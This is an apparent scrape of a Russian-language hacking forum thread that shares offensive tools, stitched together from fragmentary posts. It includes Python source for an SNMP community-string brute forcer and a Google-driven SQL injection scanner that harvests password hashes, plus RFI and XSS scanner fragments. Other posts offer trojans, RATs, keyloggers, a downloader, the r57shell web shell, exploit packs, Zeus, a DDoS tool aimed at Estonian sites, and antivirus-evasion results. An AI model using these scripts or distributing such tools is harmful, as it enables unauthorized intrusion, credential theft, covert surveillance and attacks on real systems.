nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+option+' -p 161 | grep open -B 3')[1]).read() if re.search("command not found",nmap.lower()): print "\n[-] nmap not installed!!!\n" sys.exit(1) else: ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", nmap) if ipaddr: return ipaddr
def brute(ip): print "\n[+] Attempting BruteForce:",ip try: for n in names: response = StringIO.StringIO(commands.getstatusoutput('snmpwalk '+ip+" "+n)[1]).readlines() if re.search("command not found",response[0].lower()): print "\n[-] snmpwalk not installed!!!\n" sys.exit(1) else: if verbose ==1: print "\t{- Trying:",n if len(response) > 1: print "\n\tSuccess:",ip,"Community Name:",n print "\n\tTry: snmpwalk",ip,n,"\n" except(), msg: #print "Error:",msg pass
class Worker(threading.Thread): def run(self): ipaddr = scan("-iR 1") if ipaddr != None: for ip in ipaddr: brute(ip)
if len(sys.argv) <= 2: title() print "Usage: ./snmp_random.py <option> \n" print "Example: ./snmpbrute.py -iprange 192.168.1-100.1-255 -verbose\n" print "[options]" print " -s/single <ip>: Bruteforce single ip" print " -i/-iprange <ip_range>: Scans ip range for snmp to brute force" print " -r/-random <how many to scan>: Will scan random ip's for snmp to brute force" print " -l/-list <wordlist file>: Add your own wordlist" print " -v/-verbose : Verbose Mode\n" sys.exit(1)
#Add more community names here. names = ["1234","2read","4changes","CISCO","IBM","OrigEquipMfr","SNMP","SUN","access","admin","agent","all","cisco" ,"community","default","enable","field","guest","hello","ibm","manager","mngt","monitor","netman","network" ,"none","openview","pass","password","passwd","private","proxy","public","read","read-only","read-write" ,"root","router","secret","security","snmp","snmpd","solaris","sun","switch","system","tech","test" ,"world","write"]
for arg in sys.argv[1:]: if arg.lower() == "-s" or arg.lower() == "-single": ipaddr = sys.argv[int(sys.argv[1:].index(arg))+2] mode = "Single IP" if arg.lower() == "-i" or arg.lower() == "-iprange": iprange = sys.argv[int(sys.argv[1:].index(arg))+2] mode = "Ip-Range" if arg.lower() == "-r" or arg.lower() == "-random": total = sys.argv[int(sys.argv[1:].index(arg))+2] mode = "Random" if arg.lower() == "-l" or arg.lower() == "-list": wordlist = sys.argv[int(sys.argv[1:].index(arg))+2] if arg.lower() == "-v" or arg.lower() == "-verbose": verbose = 1 title() try: print "[+] Wordlist:",wordlist,"loading" words = open(wordlist, "r").readlines() print "[+] Loaded:",len(words),"names" names = list(sets.Set(words+names)) except(IOError): print "Error: Check your wordlist path\n" sys.exit(1) except(NameError): pass
print "[+] Mode:",mode if mode == "Random": if total.isdigit() == False: print "\n[!] How many ips to scan: must be a number\n" sys.exit(1) else: print "[+] Total:",total if mode == "Ip-Range": print "[+] Range:",iprange try: if verbose ==1: print "[+] Verbose Mode On" except(NameError): verbose = 0 print "[-] Verbose Mode Off" print "[+] Names Loaded:",len(names) print "[+] Started:",timer(),"\n"
if mode == "Random": for i in range(int(total)): print "[+] Scanning:",i+1,"of",total work = Worker() work.start() time.sleep(1) if mode == "Single IP": brute(ipaddr) if mode == "Ip-Range": print "[+] Scanning:",iprange ips = scan(iprange) if ips != None: print "[+] Found:",len(ips) for ip in ips: brute(ip) else: print "\n[!] No SNMP Open"
print "\n[-] Done -",timer(),"\n"
Автор: StuDY 24.07.2007, 15:06
OverSpy v2.5 + Key
Шпион захватывает все сетевые сеансы связи, посещенные вебсайты, пароли, все электронные почты,- отправленные и полученные, все напечатанные нажатия клавиши, все компьютерные операции и открытые документы, берёт скриншоты каждые несколько минут и отправляет сообщения вам по электронной почте...
Размер :3.8 Mb
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
A good port scanner is just one of the basic tools anyone who is seriously interested in the internet needs. The BluesPortScan is, i think, the fastest scanner for 32Bit windows which you can found in the net. It scans local 5000 ports in 8sec. on my 2k (P3-866) machine. If you are using Win9x/ME it's a little bit slower... The new version 5 has now features like Port list-scans, AutoCompletion when entering known, existing host names or ips and a big big list of typical port assignments. And of course, it's a little bit more stable, especially under Win9x/Me although these OSs are definitively not the operating systems of choice for the using this program.
Хороший порт-сканер що є однією з базових утіліт для кожного,хто справді зацікавлений в потребах Інтернету. Я думаю,що це найшвидший сканер портів для 32-розрядних версій Windows,що ви зможете знайти в Інтернеті.Він сканує 5000 локальних портів за 8 секунд на моїй машині(2k (P3-866).Щоправда,якщо Ви використовуєте Win9x/MЕ,то це буде дещо повільніше...Нова,п'ята версія має зараз має такі можливості як сканування портів за певним списком,Автозавершення якщо введені відомі,існуючі імена хостів і справді великий список типових програм,що займають порти.І звичайно,ця версія дещо стабільніша,особливо під Win9x/Me,незважаючи на те що ці ОС безперечно не є тими операційними систеиами які є хорошим вибором для використання даної програми.
Рекомендую!
Автор: ter10n 25.07.2007, 01:13
Релизик от ZyklonTeam
DDoS Attacker
DDoS Attacker многопоточный, поддержка Socks 4, Socks 5. Написан на Delphi
http://zyklonteam.org/ http://zyklonteam.org/files/ddosattacker.rar пометка авторов: Special for attacking fuc*ing Estonian sites.
Автор: ter10n 31.07.2007, 01:33
Builder trojan downloader v1.2 beta public
Даунлоадер - загружает на зараженный компьютер файл (например ваш трой) с url-a указанного в билдере.
Принцип работы: После запуска сливает файл с url-a и сохраняет на зараженый компьютер в директорию заданную билдером (например в папку винды), и запускает ваш файл. После запуска вашего файла удаляет свое тело.
Это публичная версия, толком не тестировал, используйте на свой страх и риск.
for i in range(len(words)*len(users)): work = Worker() work.start() time.sleep(1) if len(success) >=1: print "\n\n[+] Login successful:",success[0], success[1] print "\t[+] Mail:",success[2],"emails" print "\t[+] Size:",success[3],"bytes\n" print "\n[-] Done\n"
Inguma (Pentesting Toolkit)
Inguma is a penetration testing toolkit entirely written in python. The framework includes modules to discover hosts, gather information about, fuzz targets, brute force user names and passwords and, of course, exploits for many products.
#!/usr/bin/python #SQL Scanner that will collect hosts using a google query. Will add the #injection code to each hosts and search for md5 in the source.
#http://darkcode.ath.cx #d3hydr8[at]gmail[dot]com
import sys, urllib2, re, sets, random, time, socket, httplib
def StripTags(text): finished = 0 while not finished: finished = 1 start = text.find("<") if start >= 0: stop = text[start:].find(">") if stop >= 0: text = text[:start] + text[start+stop+1:] finished = 0 return text
def timer(): now = time.localtime(time.time()) return time.asctime(now)
def geturls(query):
counter = 10 urls = [] while counter < int(num): url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N' opener = urllib2.build_opener(url) opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')] data = opener.open(url).read() hosts = re.findall(('\w+\.[\w\.\-/]*\.\w+'),StripTags(data)) #Lets add sites found to a list if not already or a google site. #We don't want to upset the people that got our list for us. for x in hosts: if x.find('www') != -1: x = x[x.find('www'):] if x not in urls and re.search("google", x) == None: urls.append(x) counter += 10 return urls
def tester(victim):
if victim[:7] != "http://": victim = "http://"+victim.rsplit("/",1)[0]+sql if verbose ==1: print "Testing:",victim try: source = urllib2.urlopen(victim.rsplit("/",1)[0]+sql, "80").read() md5s = re.findall("[a-f0-9]"*32,source) if len(md5s) >= 1: md5s = list(sets.Set(md5s)) print "\n[!] MD5 Found:",''.join([str(i) for i in victim.split("/",3)[:3]])[5:] for md5 in md5s: print "\t[",md5,"]\n" found_sql.append(victim) except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.BadStatusLine): pass except(KeyboardInterrupt): print "\n[-] Cancelled -",timer(),"\n" sys.exit(1) except(): pass
if len(sys.argv) < 6: usage() sys.exit(1)
for arg in sys.argv[1:]: if arg.lower() == "-v" or arg.lower() == "-verbose": verbose = 1 if arg.lower() == "-w" or arg.lower() == "-write": txt = sys.argv[int(sys.argv[1:].index(arg))+2] if arg.lower() == "-s" or arg.lower() == "-sql": sql = sys.argv[int(sys.argv[1:].index(arg))+2] if arg.lower() == "-g" or arg.lower() == "-google": query = sys.argv[int(sys.argv[1:].index(arg))+2] num = sys.argv[int(sys.argv[1:].index(arg))+3] title() socket.setdefaulttimeout(10) found_sql = [] count = 0 print "\n[+] SQL_scan Loaded" try: if verbose ==1: print "[+] Verbose Mode On" except(NameError): verbose = 0 print "[-] Verbose Mode Off" if sql[:1] != "/": sql = "/"+sql print "[+] SQL:",sql try: if txt: print "[+] File:",txt except(NameError): txt = None pass try: if num.isdigit() == False: print "\n[-] Argument [",num,"] must be a number.\n" sys.exit(1) else: if int(num) <= 10: print "\n[-] Argument [",num,"] must be greater than 10.\n" sys.exit(1) except(IndexError): print "\n[-] Need number of hosts to collect.\n" sys.exit(1) query = re.sub("\s","+",query) print "[+] Query:",query print "[+] Number:",num print "[+] Querying Google..." urls = geturls(query) print "[+] Collected:",len(urls),"hosts" print "[+] Started:",timer() print "[+] Scanning hosts..." print "\n[-] Cancel: Press Ctrl-C" for url in urls: tester(url) time.sleep(3) print "-"*65 print "\n\n[+] Potential SQL found:",len(found_sql),"\n" time.sleep(3) if txt != None and len(found_sql) >=1: sql_file = open(txt, "a") sql_file.writelines("\n\td3hydr8[at]gmail[dot]com SQL Scanner v1.0\n") sql_file.writelines("\t------------------------------------------\n\n") print "[+] Writing Data:",txt else: print "[-] No data written to disk" for k in found_sql: count+=1 if txt != None: sql_file.writelines("["+str(count)+"] "+k+"\n") print "\n["+str(count)+"]",k print "\n[-] Done -",timer(),"\n"
XSS Scanner ver 1.3
CODE
#!/usr/bin/python
#XSS Scanner that can find hosts using a google query or search one site.
#If XSS is found it attempts to collect email addresses to further your attack
#or warn the target of the flaw. When the scan is complete
#it will print out the XSS's found and or write to file, it will find false positives
#so manually check before getting to excited. It also has verbose mode and
#you can change the alert pop-up message, check options!!
#
##Changelog v1.1: added options, verbose, write to file, change alert
#Changelog v1.2: added more xss payloads, an exception, better syntax, more runtime feedback
#Changelog v1.3: added https support, more xss payloads, the ability to change port, fixed #some user input problems, exiting without error messages with Ctrl-C (KeyboardInterrupt)
#
#d3hydr8[at]gmail[dot]com
import sys, urllib2, re, sets, random, httplib, time, socket
--- [Added] - Work with injection through GET,POST,GET(inside Cookie),POST(inside Cookie) - Terminal for HTTP RAW (analogue of InetHack) - Upload file to server through SQL - Reading every available for reading file on the server:) - BackConnect from DB = MsSQL - Dump DB, if type of DB is MsSQL - Possibility of a Basic authentication - Possible Determine of the fields of a SELECT query using the ORDER BY,GROUP BY,UNION SELECT - Possible replacements comments to analog when filtering - Possible replacements spaces to analog when filtering - Possibility of autodetection of KeyWord - Possibility of autodetection of type DB - Ability to connect to the servers at random port - Ability to connect to the proxy-servers to a random port --- [Fixed] - A accurate definition of quantity the fields that supports printing values - A accurate with proxy-servers
::This creates a bunch of copies of the "readme.txt" SO the bigger the "readme.txt" file is the more space it shall take up
::It creates a file on how to "uninstall" Rapid H4xid Because this is just a joke virus (And as of now, i do not know how to remove) (So do not run on your computer) (the subdomain http://howtoremove.dave.hohs.net will be used for the removal) -the "no remove" files do not have this
::Creates 100,000 copies of "readme.txt" which takes up -195 GB -200000 MB -204800000 KB -209715200000 Bytes Of Space
::You can only close it if you cancel the process in task manager
::Adds to startup on -Vista -XP -WinNT -Win 9x
::Works on operating systems -Windows
::Creates the files but hidden! So they cant delete the files. it will just take up a lot of space with them not knowing
::The files are called "PORNO MOVIE#(insert number here).mov
::I tested myself. It works It creates about 2,0000+ files in 10 minutes and doesnt stop til it reachers 100,000 files
давно уже не приват=) но..но может кому-нибудь пригодится.
SaTaNiC Team 0day tool Satanic Socks Server v0.8-perl
CODE
#!/usr/bin/perl
# Satanic Socks Server v0.8.031206-perl # This script is private. Only for SaTaNiC team and friends. Not for sale. # Coded by drmist/STNC, web: www.stnc.ru.
Download: http://www.soft.glofff.com/downloads/fc.rar Official web site: http://soft.glofff.com
A-Squared Found nothing AntiVir Found TR/Crypt.XPACK.Gen
ArcaVir Found nothing Avast Found nothing AVG Antivirus Found nothing BitDefender Found nothing ClamAV Found nothing CPsecure Found nothing Dr.Web Found nothing F-Prot Antivirus Found nothing F-Secure Anti-Virus Found nothing Fortinet Found nothing Kaspersky Anti-Virus Found nothing NOD32 Found nothing Norman Virus Control Found nothing Panda Antivirus Found nothing Rising Antivirus Found nothing Sophos Antivirus Found Mal/Basine-C VirusBuster Found nothing VBA32 Found nothing Thx to Prosto
Автор: Creeping Death 28.10.2007, 00:19
небольшой backdoor, написанный на Delphi. вчера еще не палился.
CODE
A-Squared Found nothing AntiVir Found nothing ArcaVir Found nothing Avast Found nothing AVG Antivirus Found nothing BitDefender Found nothing ClamAV Found nothing CPsecure Found nothing Dr.Web Found nothing F-Prot Antivirus Found nothing F-Secure Anti-Virus Found nothing Fortinet Found nothing Kaspersky Anti-Virus Found nothing NOD32 Found nothing Norman Virus Control Found nothing Panda Antivirus Found nothing Rising Antivirus Found nothing Sophos Antivirus Found nothing VirusBuster Found nothing VBA32 Found nothing
Heres a simple scanner for the web app Joomla. Scans known vulnerable RFI path/files in Joomla and reports http response. Cпасибо d3hydr8
http://www.md5this.com/joomlascan.rar
Автор: неузнаваемый 10.12.2007, 16:58
BlackEnergy bot 1.9.2.rar Приклеен вирус так что запускаем на виртуальной машине!
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Связка эксплойтов - FirePack
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
r57shell v1.4
+ выполнение команд без перезагрузки страницы (команда !cls - очистка текстовой области) + добавление алиасов (вид: !алиас; как пример - два алиаса !ll и !ds, подробности в коде скрипта) + php_admin* bypass by ini_restore() + error_log() safe_mode bypass + htaccess mail.force_extra_parameters safemode bypass + SSI safe_mode bypass + COM functions safe_mode bypass + ionCube extension safe_mode bypass + win32std extension safe_mode bypass + win32service extension safe_mode bypass + perl extension safe_mode bypass + FFI extension safe_mode bypass
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
ad pack
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
система распределения траффика
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
zeus v1.0.3.7 + админка и мануал
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
пока все
Автор: неузнаваемый 17.12.2007, 14:15
Sqlninja 0.2.1-r1 Sqlninja - маленький инструмент на Perl для эксплуатации уязвимости SQL-injection. Его главная цель состоит в том, чтобы обеспечить удаленный доступ к уязвимому серверу базы данных. В этойверсии можно выделить такие изменения, как улучшение механизма распознования, добавление брутофорс атаки, устранение некоторых ошибок из предыдущей версии.
C0der:"The Bo$$" Coded in : 90% Delphi, 10%Asm http://rapidshare.com/files/79701258/ZombieRat.cab.html
Автор: Creeping Death 3.01.2008, 19:16
Scaner RFI cu >400 buguri
CODE
#!/usr/bin/perl
# RFI Web Comp v.1 - Public Version # Code by JosS / Jose Luis Góngora Fernández # Contact: sys-project[at]hotmail.com
use HTTP::Request; use LWP::UserAgent;
sub lw {
my $SO = $^O; my $linux = ""; if (index(lc($SO),"win")!=-1){ $linux="0"; }else{ $linux="1"; } if($linux){ system("clear"); } else{ system("cls"); system ("title RFI Web Comp v.1 - By JosS"); system ("color 02"); } }
&lw;
print "\t\t########################################################\n\n"; print "\t\t# RFI Web Comp .v1 - Spanish Hackers Team #\n\n"; print "\t\t# by JosS #\n\n"; print "\t\t########################################################\n\n";
$final=$host.$$cont."$shell?"; my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req);
Biohazard RAT 0.0.1.1 Alpha http://www.fileshare.ro/455624465.805
DownTroj v0.1
Код
DownTroj is a trojan horse with following features: - remote messagebox - remote info - remote file browser (+ download, upload, delete, make/del dir) - remote shell - remote task manager (+ start/kill) - remote keylogger - remotely reboot or shutdown system
Coded in C/C++ and also has: - reverse connection (bypasses routers) - more victims at the same time - unlimited number of hosts/ports to connect to - installing into location where its impossible to access with windows explorer - UD startup method via registry (but not CurrentVersion\Run :p) - task manager process hidder - windows firewall bypass
Exploits - Internet Explorer CSS Exploit - Jpeg of death - WMF maker - MS04011 lsasrv.dll rpc auto hacker v2 - Windows WMF Download and Exec Exploit - WINRAR 3.41 corrupt zip file (Proof of Concept) - MPACK - ICE PACK
Packers & Encrypters - Themida - Morphine
PsTools is a Tool Pack from sysinternals (Microsoft)
EXTRA! - Telnet Tutorial - The Giant Black Book of Computer Viruses - Great Tutorials Pack http://24.161.50.41/Hacker%20Tools%20and%20Exploits/UltimateHacking2007.rar.pass-hacksector
Dollarwarez.com acct gen http://www.st0r3.com/download.php?id=F138C0231
Автор: Creeping Death 4.01.2008, 12:15
Лошади
FEAR http://rapidshare.com/files/79681740/FearRAT.rar
Remote Format http://rapidshare.com/files/78099920/RemoteFormat.ZIP.html http://www.speedyshare.com/424250846.html http://www.2shared.com/file/2627377/5e5a1bf7/RemoteFormat.html
Иммунитет в CANVAS предоставляет сотни подвиги, эксплуатация автоматизированной системы, и всеобъемлющей, надежной эксплуатации рамки развития тестеров для проникновения и специалистов по вопросам безопасности во всем мире.
ОСНОВНЫЕ ПОСЛЕДСТВИЯ является наиболее полным продуктом для оценки вашей организации возможности для выявления, предотвращения и реагирования на угрозы информационной безопасности. К безопасно воспроизведение реального мира нападений сетевых серверов и рабочих станций, конечных пользователей систем, и веб-приложений, IMPACT позволяет найти и устранить проблемы безопасности, прежде чем данные инциденты происходят.
ищу Web Icq Bot shell, выполняет функции шелла через протокол icq на win-системе. заранее спасибо.
Автор: ter10n 9.04.2008, 21:33
Simple FTP check v0.1 by Psixo
Простой ФТП чеккер который пришлось написать для своих нужд. Необходимо было быстро и удобно прочекать около 10000 ФТП (фриихосты), а консольные решения, которые были, меня не устраивали, т.к. сортировка шла пачками по несколько сотен ФТП, то заносить их в отдельный файл,заново пускать чекк (пусть и многопоточный) - не удобно.
Просто засовываем список ФТП и жмём кнопку Check . Стартует процесс проверки проксей, при желании окно с выводом инфы о статусе чекка можно закрыть,проверка не остановится, она будет идти пока не закончаться все FTP. Надо лишь изредка заглядывать на страницу и смотреть каковы результаты.
Дополнительно справа размещены ссылки на файлы с результатами (Good FTP list и Bad FTP list). Ниже них находится ссылка для удаления одинаковых ФТП из файлов, т.е. дубляжей - Delete repetitions. И ссылка для очистки файлов с результатами Clean files.
Перед использование верно раставьте права на файлы в которые будут помещаться результаты!
ищу Web Icq Bot shell, выполняет функции шелла через протокол icq на win-системе. заранее спасибо.
найдено, кому надо смотрим здесь h__p://cdaem.ru/Win_Bot.exe (з.ы. не проверено)
Автор: Natali V 2.06.2008, 17:35
Цитата(@llexxxei @ 11.04.2007, 14:58)
Вскрываем *.rar <!--private_data=0-->
как вскрыть запароленный rar
помогите пожалуйста
Автор: MadDog 2.06.2008, 18:02
Цитата(Natali V @ 2.06.2008, 18:35)
как вскрыть запароленный rar
помогите пожалуйста
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: Hroft_clone3 3.06.2008, 17:11
Народ, нужен последний Advanced Office Password Recovery от Elcomsofta, весь форум перерыл, живых линков не нашел :(
Автор: MASKA 24.06.2008, 15:08
QUOTE(Natali V @ 2.06.2008, 19:35)
как вскрыть запароленный rar
помогите пожалуйста
если длина пароля около 8 то шансов найти пароль очень мало...
QUOTE(Hroft_clone3 @ 3.06.2008, 19:11)
Народ, нужен последний Advanced Office Password Recovery от Elcomsofta, весь форум перерыл, живых линков не нашел :(
Вот ссылки, раньше работали пробуй http://www.ftp2share.com/file/0e355040-4d66-4130-8681-45a1befac6c3/Advanced.Office.Password.Recovery.Professional.v4.0-YAG.rar.html http://rapidshare.com/files/66058392/aoprp4-yag.zip.html
Автор: Hroft_clone3 25.06.2008, 13:14
Цитата(MASKA @ 24.06.2008, 16:08)
если длина пароля около 8 то шансов найти пароль очень мало... Вот ссылки, раньше работали пробуй http://www.ftp2share.com/file/0e355040-4d66-4130-8681-45a1befac6c3/Advanced.Office.Password.Recovery.Professional.v4.0-YAG.rar.html http://rapidshare.com/files/66058392/aoprp4-yag.zip.html
Спасибо, но, увы, везде поудаляли :(
Автор: MadDog 25.06.2008, 14:48
Цитата(Hroft_clone3 @ 25.06.2008, 14:14)
Спасибо, но, увы, везде поудаляли :(
Не везде!!
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как скажете автору СПАСИБО.
Автор: MadDog 13.09.2008, 13:00
Цитата(Cmucl @ 31.07.2008, 21:19)
Нужен взломаный Xspider 7.7.Выложите у кого есть.
Поиск юзать не судьба???? http://team-madalf.com/index.php?showtopic=40726&hl=Xspider
Автор: draiver13 2.10.2008, 20:21
программка для декодирования телефонов по imei
если телефон заблокирован просто нажимаем в телефоне *#06# и переписываем из дисплея телефона в программу и генерируется код для разблокировки
http://depositfiles.com/files/8407047
Автор: Rim 11.10.2008, 12:25
DosHTTP 2.0
Интерфейс: Английский Размер: 296 Кб ОС: Windows
» Описание «
Легкая и довольно мощная утилита для организации DoS атак или флуда. Полная зарегистрированная версия. Все сводится лишь к вводу адреса и нажатия кнопки "начать флуд". Перед началом использования ознакомьтесь с файлов инструкция.txt
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: MYSTiQUE 14.10.2008, 14:23
Охренительный фейк rapidshare.de
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как скажете автору СПАСИБО.
Автор: Rim 14.10.2008, 16:41
Crazy Mail 6
Интерфейс: Русский Размер: 1.3 Мб Лекарство: не требуется ОС: Windows 95/98/ME/NT/2000/XP/2003/Vista
» Описание «
Программа Crazy Mail предназначена для бесплатной отправки текстовых и HTML сообщений с подменой E-Mail адреса и отчётом о доставке.
Например, вам нужно отправить письмо определённому адресату, и необходимо чтобы он думал, что это письмо ему пришло не от вас а от компании к примеру Microsoft, в этом случае вам необходимо в поле "От кого" ввести адрес компании Microsoft.
Что нового: 1. Реализован редактор сообщений. 2. Добавлена новая функция "Отчёт о доставке". 3. Создан и внедрён новый движок отправки для более облегчённой отправки для ЦП. 4. Исправлено множество незначительных и не видимых ошибок которые были в предыдущих версиях. 5. Добавлено новые скины. 6. Добавлены новые расширённые функции по программе. 7. По просьбе пользователей реализована записная книжка. 8. Добавлена возможность отправлять письма в HTML формате. 9. Полностью был переписан двигатель программы, что гораздо снизило нагрузку при отправке сообщения на процессор ПК. А так же скорость передачи сообщения. 10. Написана функция по настройке формы, это выбор "Градиента", "Контрастности". А так же сменные скины. 11. Исправлены некоторые ошибки прежних версий... 12. Исправлена ошибка существующяя в предыдущих версиях с кодировкой. Теперь "имя" отображается корректно. 13. Откорректирована фильтрация сообщений, что позволяет отправлять сообщение в соответствии с единым стандартом. 14. Исправлено "мигание окна", тоесть окошко формы перестаёт мигать чёрным и терятся... 15. Внесены коррективы в систему отправки HTML сообщений. Улучшена производительность программы...
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: HACKALL 17.10.2008, 23:11
Цитата(draiver13 @ 2.10.2008, 21:21)
программка для декодирования телефонов по imei
если телефон заблокирован просто нажимаем в телефоне *#06# и переписываем из дисплея телефона в программу и генерируется код для разблокировки
http://depositfiles.com/files/8407047
Чет эта прога не запускается вообще..
Автор: DiZz3l 19.10.2008, 20:31
Cборник содержит самые необходимые программы и утилиты для хакера. Все представлено в удобной оболочке с фоновой музыкой.
Содержит следующий софт: - Cain and Abel (сниффер) - John the Ripper (мощный брутфорсер) - NetStumbler (позволяет определить радиус действия сети WiFi - в реальном времени на диаграмме можно увидеть величину полезного сигнала) - Nmap (навороченый сетевой сканер) - Putty (неплохой телнет клиент) - SuperScan (мощный сканер TCP портов, pinger и hostname resolver) - Hping (позволяет генерировать специальные ICMP/UDP/TCP пакеты и просматривать ответы пингуемого хоста в стиле обычной утилиты ping) - Lcp (аудит и восстановление паролей Windows NT / 2000 / XP / 2003) - Nikto (perl сканер уязвимостей Web сервера, с поддержкой SSL) - Kismet (сниффер беспроводной сети 802.11 и дешифратор пакетов)
Размер: 56.53 МБ
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: DiZz3l 19.10.2008, 20:51
Easy Rapidshare Points 3.0
Эта программа пригодится для охотников за поинтами на rapidshare. Не секрет , что многие зарабатывают тем , что закачивают файлы на rapidshare и получают бонусы от скачек своих файлов. Это объясняет присылаемые новости на многие сайты. Чем больше скачек, тем больше поинтов у аплоадера. Easy Rapidshare Points будет сама скачивать ваши файлы как дармовой пользователь! Эдакий бот для rapidshare Программа качает - вы получаете поинты.
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: Rim 22.10.2008, 13:54
KGB Employee Monitor 4.2.2
Интерфейс: Английский Размер: 6.4Мб
» Описание «
Функциональные возможности программы позволяют Вам установить невидимый режим работы KGB Spy, так что никто и не догадается, что за ним следит самый настоящий "клавиатурный шпион". KGB Spy незаметно следит за работой компьютера: записывает вводимую с клавиатуры информацию, данные из буфера обмена, проводит мониторинг посещенных сайтов.
Собранная в ходе мониторинга информация сохраняется в базу данных, к которой только вы имеете доступ. Вы можете получить на свой электронный ящик письмо с подробной информацией о том, кто, когда и что делал на компьютере. Вам просто нужно будет время от времени заглядывать в свою почту.
Главные особенности Шпиона КГБ: Видимый / невидимый режим Перехват нажатых клавиш на клавиатуре Мониторинг буфера обмена Запись снимков экрана (скриншотов) Мониторинг посещенных веб-сайтов Уведомления на электронный ящик о наборе определенных слов Очень удобный и понятный интерфейс
Удобный и понятный интерфейс Мы постарались сделать интерфейс KGB Spy максимально удобным и понятным всем, даже начинающим компьютерным пользователям.
Перехват нажатых клавиш на клавиатуре KGB Spy сохраняет в лог все клавиши, которые нажимает пользователь на клавиатуре
Запись снимков экрана (скриншотов) KGB Spy записывает не только вводимую с клавиатуры информацию и данные из буфера обмена, но также делает снимки экрана (скриншоты)
Мониторинг буфера обмена Одной из основных функциональных возможностей программы является наблюдение за содержанием информации в буфере обмена, с которым работает каждый без исключения пользователь компьютера
Мониторинг посещенных веб-сайтов Сохранить банковский счет фирмы в положительном балансе, а Интернет-трафик в умеренном размере - разве это не мечта любого руководителя фирмы? Сделайте мечту реальностью с помощью KGB Spy, который даст полный отчет обо всех посещаемых пользователем сайтах. Кстати, это также и решение проблемы для родителей, которые переживают за содержание полученной из Интернета информации их чадом
Видимый/невидимый режим работы Программа имеет два режима работы: видимый и невидимый. Причем если Вы выберите невидимый режим, то пользователи не заметят работы KGB Spy
Мониторинг запуска и закрытия программ Каждый компьютер кроме установленной на нем операционной системы также имеет в своем арсенале достаточное количество программ, необходимых в работе. KGB Keylogger следит за запуском и закрытием программ. Эта функция может пригодиться как для выяснения причин каких-либо технических неполадок, так и для определения своевременности или несвоевременности использования того или иного программного приложения
Отслеживание включения/выключения/перезагрузки компьютера В XXI веке компьютер стал неотъемлемой частью жизни и работы любого человека. Но в каждом механизме есть инструменты, контролировать функционирование которых очень сложно. KGB Spy отслеживает включение/выключение/перезагрузку компьютера и позволяет максимально оперативно следить за происходящими с машиной/машинами событиями
Полная мультипользовательская поддержка Неважно сколько в вашей системе пользователей. KGB Spy может следить за отдельными, например, детьми или всеми
Уведомления на электронный ящик о наборе запрещенных слов Если пользователь наберет сигнальное (запрещенное), то KGB Spy пометит эту запись в логе специальной меткой или отправит вам уведомление по электронной почте
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: shurabal 2.11.2008, 20:19
Цитата(draiver13 @ 2.10.2008, 21:21)
программка для декодирования телефонов по imei
если телефон заблокирован просто нажимаем в телефоне *#06# и переписываем из дисплея телефона в программу и генерируется код для разблокировки
http://depositfiles.com/files/8407047
Почему прога не запускается?
Автор: MYSTiQUE 11.11.2008, 17:21
Win32 SHELLCODE CONSTRUCTOR от z0mbie
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как скажете автору СПАСИБО.
Что то мне это вирус напоминает. Вобщем, скачал, проверил NOD32-ом, распакавал, а програмульки то в папке не оказалось, хотя в архиве её видно и НОД не сработал... Попробовал запустить прямо из архива а РАР мне и говорит: "А распаковывать то нечего"...
Вот я и говорю что мне эта програмка вирус напоминает, хотя может я чегонить не понимаю? Тогда прошу разъяснений или объяснений.
Автор: MYSTiQUE 13.11.2008, 16:39
Троян EPS II
» Описание «
Пеpекомпелиpован с помощью VC++ 5.0 (файл меньше по pазмеpу). - посылает месаги pаз в неделю. - для вылоза в RING0 используется RING0 Dynamic VxD Manager так, что тепеpь AWP (Advanced Windows Protector http://awp.faithweb.com) остался на долго позади EPS II. -скpывает свое тело. умеет тепеpь воpовать паpоли от ICQ. умеет пpиатачивать файлы. REGVALCEXE добавлена к секции ATACHFILES. RING0.VXD удаляется после использования.
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как скажете автору СПАСИБО.
Keyboard Grabber не ругайте... Прога хоть и старовата, но работает отменно..
» Описание «
Keyboard Grabber 1.0 (KBG)
Описание: --------- Программа является клавиатурным шпионом и ведет log всех нажатых клавиш. Также в программе имеются функции: 1) обнаружения в окнах и "похищения" ***** - паролей; 2) блокировки клавиатуры для других программ. 3) перехват и запись содержимого буфера обмена в файл log'a при нажатии комбинации Ctrl+v(вставка) при условии, что буфер обмена содержит текстовую информацию.
